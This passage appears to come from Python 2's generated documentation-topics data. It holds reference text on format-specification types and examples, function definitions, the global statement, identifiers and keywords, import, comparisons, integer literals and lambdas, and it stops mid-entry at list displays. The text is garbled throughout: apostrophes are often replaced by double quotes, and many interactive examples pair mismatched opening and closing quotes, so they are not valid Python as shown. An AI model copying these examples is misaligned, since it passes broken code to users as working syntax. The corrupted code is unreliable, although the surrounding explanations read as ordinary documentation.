a decimal number indicating how many digits should\nbe displayed after the decimal point for a floating point value\nformatted with "\"f\"" and "\"F\"", or before and after the decimal point\nfor a floating point value formatted with "\"g\"" or "\"G\"". For non-\nnumber types the field indicates the maximum field size - in other\nwords, how many characters will be used from the field content. The\n*precision* is not allowed for integer values.\n\nFinally, the *type* determines how the data should be presented.\n\nThe available string presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\"s\"" | String format. This is the default type for strings and |\n | | may be omitted. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\"s\"". |\n +-----------+------------------------------------------------------------+\n\nThe available integer presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\"b\"" | Binary format. Outputs the number in base 2. |\n +-----------+------------------------------------------------------------+\n | "\"c\"" | Character. Converts the integer to the corresponding |\n | | unicode character before printing. |\n +-----------+------------------------------------------------------------+\n | "\"d\"" | Decimal Integer. Outputs the number in base 10. |\n +-----------+------------------------------------------------------------+\n | "\"o\"" | Octal format. Outputs the number in base 8. |\n +-----------+------------------------------------------------------------+\n | "\"x\"" | Hex format. Outputs the number in base 16, using lower- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\"X\"" | Hex format. Outputs the number in base 16, using upper- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\"n\"" | Number. This is the same as "\"d\"", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\"d\"". |\n +-----------+------------------------------------------------------------+\n\nIn addition to the above presentation types, integers can be formatted\nwith the floating point presentation types listed below (except "\"n\""\nand None). When doing so, "float()" is used to convert the integer to\na floating point number before formatting.\n\nThe available presentation types for floating point and decimal values\nare:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\"e\"" | Exponent notation. Prints the number in scientific |\n | | notation using the letter \"e\" to indicate the exponent. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\"E\"" | Exponent notation. Same as "\"e\"" except it uses an upper |\n | | case \"E\" as the separator character. |\n +-----------+------------------------------------------------------------+\n | "\"f\"" | Fixed point. Displays the number as a fixed-point number. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\"F\"" | Fixed point. Same as "\"f\"". |\n +-----------+------------------------------------------------------------+\n | "\"g\"" | General format. For a given precision "p >= 1", this |\n | | rounds the number to "p" significant digits and then |\n | | formats the result in either fixed-point format or in |\n | | scientific notation, depending on its magnitude. The |\n | | precise rules are as follows: suppose that the result |\n | | formatted with presentation type "\"e\"" and precision "p-1" |\n | | would have exponent "exp". Then if "-4 <= exp < p", the |\n | | number is formatted with presentation type "\"f\"" and |\n | | precision "p-1-exp". Otherwise, the number is formatted |\n | | with presentation type "\"e\"" and precision "p-1". In both |\n | | cases insignificant trailing zeros are removed from the |\n | | significand, and the decimal point is also removed if |\n | | there are no remaining digits following it. Positive and |\n | | negative infinity, positive and negative zero, and nans, |\n | | are formatted as "inf", "-inf", "0", "-0" and "nan" |\n | | respectively, regardless of the precision. A precision of |\n | | "0" is treated as equivalent to a precision of "1". The |\n | | default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\"G\"" | General format. Same as "\"g\"" except switches to "\"E\"" if |\n | | the number gets too large. The representations of infinity |\n | | and NaN are uppercased, too. |\n +-----------+------------------------------------------------------------+\n | "\"n\"" | Number. This is the same as "\"g\"", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. |\n +-----------+------------------------------------------------------------+\n | "\"%\"" | Percentage. Multiplies the number by 100 and displays in |\n | | fixed ("\"f\"") format, followed by a percent sign. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\"g\"". |\n +-----------+------------------------------------------------------------+\n\n\nFormat examples\n===============\n\nThis section contains examples of the new format syntax and comparison\nwith the old "%"-formatting.\n\nIn most of the cases the syntax is similar to the old "%"-formatting,\nwith the addition of the "{}" and with ":" used instead of "%". For\nexample, "\'%03.2f\'" can be translated to "\'{:03.2f}\"".\n\nThe new format syntax also supports new and different options, shown\nin the follow examples.\n\nAccessing arguments by position:\n\n >>> \"{0}, {1}, {2}\".format(\"a\", \"b\", \"c\")\n \"a, b, c\"\n >>> \"{}, {}, {}\".format(\"a\", \"b\", \"c\") # 2.7+ only\n \"a, b, c\"\n >>> \"{2}, {1}, {0}\".format(\"a\", \"b\", \"c\")\n \"c, b, a\"\n >>> \"{2}, {1}, {0}\".format(*\"abc\") # unpacking argument sequence\n \"c, b, a\"\n >>> \"{0}{1}{0}\".format(\"abra\", \"cad\") # arguments\" indices can be repeated\n \"abracadabra\"\n\nAccessing arguments by name:\n\n >>> \"Coordinates: {latitude}, {longitude}\".format(latitude=\"37.24N\", longitude=\"-115.81W\")\n \"Coordinates: 37.24N, -115.81W\"\n >>> coord = {\"latitude\": \"37.24N\", \"longitude\": \"-115.81W\"}\n >>> \'Coordinates: {latitude}, {longitude}\".format(**coord)\n \"Coordinates: 37.24N, -115.81W\"\n\nAccessing arguments\" attributes:\n\n >>> c = 3-5j\n >>> (\"The complex number {0} is formed from the real part {0.real} \"\n ... \"and the imaginary part {0.imag}.\').format(c)\n \'The complex number (3-5j) is formed from the real part 3.0 and the imaginary part -5.0.\'\n >>> class Point(object):\n ... def __init__(self, x, y):\n ... self.x, self.y = x, y\n ... def __str__(self):\n ... return \'Point({self.x}, {self.y})\".format(self=self)\n ...\n >>> str(Point(4, 2))\n \"Point(4, 2)\"\n\nAccessing arguments\" items:\n\n >>> coord = (3, 5)\n >>> \"X: {0[0]}; Y: {0[1]}\".format(coord)\n \"X: 3; Y: 5\"\n\nReplacing "%s" and "%r":\n\n >>> "repr() shows quotes: {!r}; str() doesn\'t: {!s}".format(\"test1\", \"test2\")\n "repr() shows quotes: \"test1\"; str() doesn\"t: test2"\n\nAligning the text and specifying a width:\n\n >>> \"{:<30}\'.format(\'left aligned\')\n \'left aligned \'\n >>> \'{:>30}\".format(\"right aligned\")\n \" right aligned\"\n >>> \"{:^30}\'.format(\'centered\')\n \' centered \'\n >>> \'{:*^30}\".format(\"centered\") # use \"*\" as a fill char\n \"***********centered***********\"\n\nReplacing "%+f", "%-f", and "% f" and specifying a sign:\n\n >>> \"{:+f}; {:+f}\".format(3.14, -3.14) # show it always\n \"+3.140000; -3.140000\"\n >>> \"{: f}; {: f}\".format(3.14, -3.14) # show a space for positive numbers\n \" 3.140000; -3.140000\"\n >>> \"{:-f}; {:-f}\".format(3.14, -3.14) # show only the minus -- same as \"{:f}; {:f}\"\n \"3.140000; -3.140000\"\n\nReplacing "%x" and "%o" and converting the value to different bases:\n\n >>> # format also supports binary numbers\n >>> "int: {0:d}; hex: {0:x}; oct: {0:o}; bin: {0:b}".format(42)\n \"int: 42; hex: 2a; oct: 52; bin: 101010\"\n >>> # with 0x, 0o, or 0b as prefix:\n >>> "int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: {0:#b}".format(42)\n \'int: 42; hex: 0x2a; oct: 0o52; bin: 0b101010\'\n\nUsing the comma as a thousands separator:\n\n >>> \'{:,}\'.format(1234567890)\n \'1,234,567,890\'\n\nExpressing a percentage:\n\n >>> points = 19.5\n >>> total = 22\n >>> \'Correct answers: {:.2%}\'.format(points/total)\n \'Correct answers: 88.64%\'\n\nUsing type-specific formatting:\n\n >>> import datetime\n >>> d = datetime.datetime(2010, 7, 4, 12, 15, 58)\n >>> \'{:%Y-%m-%d %H:%M:%S}\'.format(d)\n \'2010-07-04 12:15:58\'\n\nNesting arguments and more complex examples:\n\n >>> for align, text in zip(\'<^>\', [\'left\', \'center\', \'right\']):\n ... \'{0:{fill}{align}16}\'.format(text, fill=align, align=align)\n ...\n \'left<<<<<<<<<<<<\'\n \'^^^^^center^^^^^\'\n \'>>>>>>>>>>>right\'\n >>>\n >>> octets = [192, 168, 0, 1]\n >>> \'{:02X}{:02X}{:02X}{:02X}\'.format(*octets)\n \'C0A80001\'\n >>> int(_, 16)\n 3232235521\n >>>\n >>> width = 5\n >>> for num in range(5,12):\n ... for base in \'dXob\':\n ... print \'{0:{width}{base}}\'.format(num, base=base, width=width),\n ... print\n ...\n 5 5 5 101\n 6 6 6 110\n 7 7 7 111\n 8 8 10 1000\n 9 9 11 1001\n 10 A 12 1010\n 11 B 13 1011\n', 'function': u'\nFunction definitions\n********************\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n def whats_on_the_telly(penguin=None):\n if penguin is None:\n penguin = []\n penguin.append("property of the zoo")\n return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from position arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n', 'global': u'\nThe "global" statement\n**********************\n\n global_stmt ::= "global" identifier ("," identifier)*\n\nThe "global" statement is a declaration which holds for the entire\ncurrent code block. It means that the listed identifiers are to be\ninterpreted as globals. It would be impossible to assign to a global\nvariable without "global", although free variables may refer to\nglobals without being declared global.\n\nNames listed in a "global" statement must not be used in the same code\nblock textually preceding that "global" statement.\n\nNames listed in a "global" statement must not be defined as formal\nparameters or in a "for" loop control target, "class" definition,\nfunction definition, or "import" statement.\n\n**CPython implementation detail:** The current implementation does not\nenforce the latter two restrictions, but programs should not abuse\nthis freedom, as future implementations may enforce them or silently\nchange the meaning of the program.\n\n**Programmer\'s note:** the "global" is a directive to the parser. It\napplies only to code parsed at the same time as the "global"\nstatement. In particular, a "global" statement contained in an "exec"\nstatement does not affect the code block *containing* the "exec"\nstatement, and code contained in an "exec" statement is unaffected by\n"global" statements in the code containing the "exec" statement. The\nsame applies to the "eval()", "execfile()" and "compile()" functions.\n', 'id-classes': u'\nReserved classes of identifiers\n*******************************\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n Not imported by "from module import *". The special identifier "_"\n is used in the interactive interpreter to store the result of the\n last evaluation; it is stored in the "__builtin__" module. When\n not in interactive mode, "_" has no special meaning and is not\n defined. See section The import statement.\n\n Note: The name "_" is often used in conjunction with\n internationalization; refer to the documentation for the\n "gettext" module for more information on this convention.\n\n"__*__"\n System-defined names. These names are defined by the interpreter\n and its implementation (including the standard library). Current\n system names are discussed in the Special method names section and\n elsewhere. More will likely be defined in future versions of\n Python. *Any* use of "__*__" names, in any context, that does not\n follow explicitly documented use, is subject to breakage without\n warning.\n\n"__*"\n Class-private names. Names in this category, when used within the\n context of a class definition, are re-written to use a mangled form\n to help avoid name clashes between "private" attributes of base and\n derived classes. See section Identifiers (Names).\n', 'identifiers': u'\nIdentifiers and keywords\n************************\n\nIdentifiers (also referred to as *names*) are described by the\nfollowing lexical definitions:\n\n identifier ::= (letter|"_") (letter | digit | "_")*\n letter ::= lowercase | uppercase\n lowercase ::= "a"..."z"\n uppercase ::= "A"..."Z"\n digit ::= "0"..."9"\n\nIdentifiers are unlimited in length. Case is significant.\n\n\nKeywords\n========\n\nThe following identifiers are used as reserved words, or *keywords* of\nthe language, and cannot be used as ordinary identifiers. They must\nbe spelled exactly as written here:\n\n and del from not while\n as elif global or with\n assert else if pass yield\n break except import print\n class exec in raise\n continue finally is return\n def for lambda try\n\nChanged in version 2.4: "None" became a constant and is now recognized\nby the compiler as a name for the built-in object "None". Although it\nis not a keyword, you cannot assign a different object to it.\n\nChanged in version 2.5: Using "as" and "with" as identifiers triggers\na warning. To use them as keywords, enable the "with_statement"\nfuture feature .\n\nChanged in version 2.6: "as" and "with" are full keywords.\n\n\nReserved classes of identifiers\n===============================\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n Not imported by "from module import *". The special identifier "_"\n is used in the interactive interpreter to store the result of the\n last evaluation; it is stored in the "__builtin__" module. When\n not in interactive mode, "_" has no special meaning and is not\n defined. See section The import statement.\n\n Note: The name "_" is often used in conjunction with\n internationalization; refer to the documentation for the\n "gettext" module for more information on this convention.\n\n"__*__"\n System-defined names. These names are defined by the interpreter\n and its implementation (including the standard library). Current\n system names are discussed in the Special method names section and\n elsewhere. More will likely be defined in future versions of\n Python. *Any* use of "__*__" names, in any context, that does not\n follow explicitly documented use, is subject to breakage without\n warning.\n\n"__*"\n Class-private names. Names in this category, when used within the\n context of a class definition, are re-written to use a mangled form\n to help avoid name clashes between "private" attributes of base and\n derived classes. See section Identifiers (Names).\n', 'if': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'imaginary': u'\nImaginary literals\n******************\n\nImaginary literals are described by the following lexical definitions:\n\n imagnumber ::= (floatnumber | intpart) ("j" | "J")\n\nAn imaginary literal yields a complex number with a real part of 0.0.\nComplex numbers are represented as a pair of floating point numbers\nand have the same restrictions on their range. To create a complex\nnumber with a nonzero real part, add a floating point number to it,\ne.g., "(3+4j)". Some examples of imaginary literals:\n\n 3.14j 10.j 10j .001j 1e100j 3.14e-10j\n', 'import': u'\nThe "import" statement\n**********************\n\n import_stmt ::= "import" module ["as" name] ( "," module ["as" name] )*\n | "from" relative_module "import" identifier ["as" name]\n ( "," identifier ["as" name] )*\n | "from" relative_module "import" "(" identifier ["as" name]\n ( "," identifier ["as" name] )* [","] ")"\n | "from" module "import" "*"\n module ::= (identifier ".")* identifier\n relative_module ::= "."* module | "."+\n name ::= identifier\n\nImport statements are executed in two steps: (1) find a module, and\ninitialize it if necessary; (2) define a name or names in the local\nnamespace (of the scope where the "import" statement occurs). The\nstatement comes in two forms differing on whether it uses the "from"\nkeyword. The first form (without "from") repeats these steps for each\nidentifier in the list. The form with "from" performs step (1) once,\nand then performs step (2) repeatedly.\n\nTo understand how step (1) occurs, one must first understand how\nPython handles hierarchical naming of modules. To help organize\nmodules and provide a hierarchy in naming, Python has a concept of\npackages. A package can contain other packages and modules while\nmodules cannot contain other modules or packages. From a file system\nperspective, packages are directories and modules are files.\n\nOnce the name of the module is known (unless otherwise specified, the\nterm "module" will refer to both packages and modules), searching for\nthe module or package can begin. The first place checked is\n"sys.modules", the cache of all modules that have been imported\npreviously. If the module is found there then it is used in step (2)\nof import.\n\nIf the module is not found in the cache, then "sys.meta_path" is\nsearched (the specification for "sys.meta_path" can be found in **PEP\n302**). The object is a list of *finder* objects which are queried in\norder as to whether they know how to load the module by calling their\n"find_module()" method with the name of the module. If the module\nhappens to be contained within a package (as denoted by the existence\nof a dot in the name), then a second argument to "find_module()" is\ngiven as the value of the "__path__" attribute from the parent package\n(everything up to the last dot in the name of the module being\nimported). If a finder can find the module it returns a *loader*\n(discussed later) or returns "None".\n\nIf none of the finders on "sys.meta_path" are able to find the module\nthen some implicitly defined finders are queried. Implementations of\nPython vary in what implicit meta path finders are defined. The one\nthey all do define, though, is one that handles "sys.path_hooks",\n"sys.path_importer_cache", and "sys.path".\n\nThe implicit finder searches for the requested module in the "paths"\nspecified in one of two places ("paths" do not have to be file system\npaths). If the module being imported is supposed to be contained\nwithin a package then the second argument passed to "find_module()",\n"__path__" on the parent package, is used as the source of paths. If\nthe module is not contained in a package then "sys.path" is used as\nthe source of paths.\n\nOnce the source of paths is chosen it is iterated over to find a\nfinder that can handle that path. The dict at\n"sys.path_importer_cache" caches finders for paths and is checked for\na finder. If the path does not have a finder cached then\n"sys.path_hooks" is searched by calling each object in the list with a\nsingle argument of the path, returning a finder or raises\n"ImportError". If a finder is returned then it is cached in\n"sys.path_importer_cache" and then used for that path entry. If no\nfinder can be found but the path exists then a value of "None" is\nstored in "sys.path_importer_cache" to signify that an implicit, file-\nbased finder that handles modules stored as individual files should be\nused for that path. If the path does not exist then a finder which\nalways returns "None" is placed in the cache for the path.\n\nIf no finder can find the module then "ImportError" is raised.\nOtherwise some finder returned a loader whose "load_module()" method\nis called with the name of the module to load (see **PEP 302** for the\noriginal definition of loaders). A loader has several responsibilities\nto perform on a module it loads. First, if the module already exists\nin "sys.modules" (a possibility if the loader is called outside of the\nimport machinery) then it is to use that module for initialization and\nnot a new module. But if the module does not exist in "sys.modules"\nthen it is to be added to that dict before initialization begins. If\nan error occurs during loading of the module and it was added to\n"sys.modules" it is to be removed from the dict. If an error occurs\nbut the module was already in "sys.modules" it is left in the dict.\n\nThe loader must set several attributes on the module. "__name__" is to\nbe set to the name of the module. "__file__" is to be the "path" to\nthe file unless the module is built-in (and thus listed in\n"sys.builtin_module_names") in which case the attribute is not set. If\nwhat is being imported is a package then "__path__" is to be set to a\nlist of paths to be searched when looking for modules and packages\ncontained within the package being imported. "__package__" is optional\nbut should be set to the name of package that contains the module or\npackage (the empty string is used for module not contained in a\npackage). "__loader__" is also optional but should be set to the\nloader object that is loading the module.\n\nIf an error occurs during loading then the loader raises "ImportError"\nif some other exception is not already being propagated. Otherwise the\nloader returns the module that was loaded and initialized.\n\nWhen step (1) finishes without raising an exception, step (2) can\nbegin.\n\nThe first form of "import" statement binds the module name in the\nlocal namespace to the module object, and then goes on to import the\nnext identifier, if any. If the module name is followed by "as", the\nname following "as" is used as the local name for the module.\n\nThe "from" form does not bind the module name: it goes through the\nlist of identifiers, looks each one of them up in the module found in\nstep (1), and binds the name in the local namespace to the object thus\nfound. As with the first form of "import", an alternate local name\ncan be supplied by specifying ""as" localname". If a name is not\nfound, "ImportError" is raised. If the list of identifiers is\nreplaced by a star ("\'*\'"), all public names defined in the module are\nbound in the local namespace of the "import" statement..\n\nThe *public names* defined by a module are determined by checking the\nmodule\'s namespace for a variable named "__all__"; if defined, it must\nbe a sequence of strings which are names defined or imported by that\nmodule. The names given in "__all__" are all considered public and\nare required to exist. If "__all__" is not defined, the set of public\nnames includes all names found in the module\'s namespace which do not\nbegin with an underscore character ("\'_\'"). "__all__" should contain\nthe entire public API. It is intended to avoid accidentally exporting\nitems that are not part of the API (such as library modules which were\nimported and used within the module).\n\nThe "from" form with "*" may only occur in a module scope. If the\nwild card form of import --- "import *" --- is used in a function and\nthe function contains or is a nested block with free variables, the\ncompiler will raise a "SyntaxError".\n\nWhen specifying what module to import you do not have to specify the\nabsolute name of the module. When a module or package is contained\nwithin another package it is possible to make a relative import within\nthe same top package without having to mention the package name. By\nusing leading dots in the specified module or package after "from" you\ncan specify how high to traverse up the current package hierarchy\nwithout specifying exact names. One leading dot means the current\npackage where the module making the import exists. Two dots means up\none package level. Three dots is up two levels, etc. So if you execute\n"from . import mod" from a module in the "pkg" package then you will\nend up importing "pkg.mod". If you execute "from ..subpkg2 import mod"\nfrom within "pkg.subpkg1" you will import "pkg.subpkg2.mod". The\nspecification for relative imports is contained within **PEP 328**.\n\n"importlib.import_module()" is provided to support applications that\ndetermine which modules need to be loaded dynamically.\n\n\nFuture statements\n=================\n\nA *future statement* is a directive to the compiler that a particular\nmodule should be compiled using syntax or semantics that will be\navailable in a specified future release of Python. The future\nstatement is intended to ease migration to future versions of Python\nthat introduce incompatible changes to the language. It allows use of\nthe new features on a per-module basis before the release in which the\nfeature becomes standard.\n\n future_statement ::= "from" "__future__" "import" feature ["as" name]\n ("," feature ["as" name])*\n | "from" "__future__" "import" "(" feature ["as" name]\n ("," feature ["as" name])* [","] ")"\n feature ::= identifier\n name ::= identifier\n\nA future statement must appear near the top of the module. The only\nlines that can appear before a future statement are:\n\n* the module docstring (if any),\n\n* comments,\n\n* blank lines, and\n\n* other future statements.\n\nThe features recognized by Python 2.6 are "unicode_literals",\n"print_function", "absolute_import", "division", "generators",\n"nested_scopes" and "with_statement". "generators", "with_statement",\n"nested_scopes" are redundant in Python version 2.6 and above because\nthey are always enabled.\n\nA future statement is recognized and treated specially at compile\ntime: Changes to the semantics of core constructs are often\nimplemented by generating different code. It may even be the case\nthat a new feature introduces new incompatible syntax (such as a new\nreserved word), in which case the compiler may need to parse the\nmodule differently. Such decisions cannot be pushed off until\nruntime.\n\nFor any given release, the compiler knows which feature names have\nbeen defined, and raises a compile-time error if a future statement\ncontains a feature not known to it.\n\nThe direct runtime semantics are the same as for any import statement:\nthere is a standard module "__future__", described later, and it will\nbe imported in the usual way at the time the future statement is\nexecuted.\n\nThe interesting runtime semantics depend on the specific feature\nenabled by the future statement.\n\nNote that there is nothing special about the statement:\n\n import __future__ [as name]\n\nThat is not a future statement; it\'s an ordinary import statement with\nno special semantics or syntax restrictions.\n\nCode compiled by an "exec" statement or calls to the built-in\nfunctions "compile()" and "execfile()" that occur in a module "M"\ncontaining a future statement will, by default, use the new syntax or\nsemantics associated with the future statement. This can, starting\nwith Python 2.2 be controlled by optional arguments to "compile()" ---\nsee the documentation of that function for details.\n\nA future statement typed at an interactive interpreter prompt will\ntake effect for the rest of the interpreter session. If an\ninterpreter is started with the "-i" option, is passed a script name\nto execute, and the script includes a future statement, it will be in\neffect in the interactive session started after the script is\nexecuted.\n\nSee also:\n\n **PEP 236** - Back to the __future__\n The original proposal for the __future__ mechanism.\n', 'in': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it make sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so """ in "abc"" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse true value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'integers': u'\nInteger and long integer literals\n*********************************\n\nInteger and long integer literals are described by the following\nlexical definitions:\n\n longinteger ::= integer ("l" | "L")\n integer ::= decimalinteger | octinteger | hexinteger | bininteger\n decimalinteger ::= nonzerodigit digit* | "0"\n octinteger ::= "0" ("o" | "O") octdigit+ | "0" octdigit+\n hexinteger ::= "0" ("x" | "X") hexdigit+\n bininteger ::= "0" ("b" | "B") bindigit+\n nonzerodigit ::= "1"..."9"\n octdigit ::= "0"..."7"\n bindigit ::= "0" | "1"\n hexdigit ::= digit | "a"..."f" | "A"..."F"\n\nAlthough both lower case "\'l\'" and upper case "\'L\'" are allowed as\nsuffix for long integers, it is strongly recommended to always use\n"\'L\'", since the letter "\'l\'" looks too much like the digit "\'1\'".\n\nPlain integer literals that are above the largest representable plain\ninteger (e.g., 2147483647 when using 32-bit arithmetic) are accepted\nas if they were long integers instead. [1] There is no limit for long\ninteger literals apart from what can be stored in available memory.\n\nSome examples of plain integer literals (first row) and long integer\nliterals (second and third rows):\n\n 7 2147483647 0177\n 3L 79228162514264337593543950336L 0377L 0x100000000L\n 79228162514264337593543950336 0xdeadbeef\n', 'lambda': u'\nLambdas\n*******\n\n lambda_expr ::= "lambda" [parameter_list]: expression\n old_lambda_expr ::= "lambda" [parameter_list]: old_expression\n\nLambda expressions (sometimes called lambda forms) have the same\nsyntactic position as expressions. They are a shorthand to create\nanonymous functions; the expression "lambda arguments: expression"\nyields a function object. The unnamed object behaves like a function\nobject defined with\n\n def name(arguments):\n return expression\n\nSee section Function definitions for the syntax of parameter lists.\nNote that functions created with lambda expressions cannot contain\nstatements.\n', 'lists': u'\nList displays\n*************\n\nA list display is a possibly empty series of expressions enclosed in\nsquare brackets:\n\n list_display ::= "[" [expression_list | list_comprehension] "]"\n list_comprehension ::= 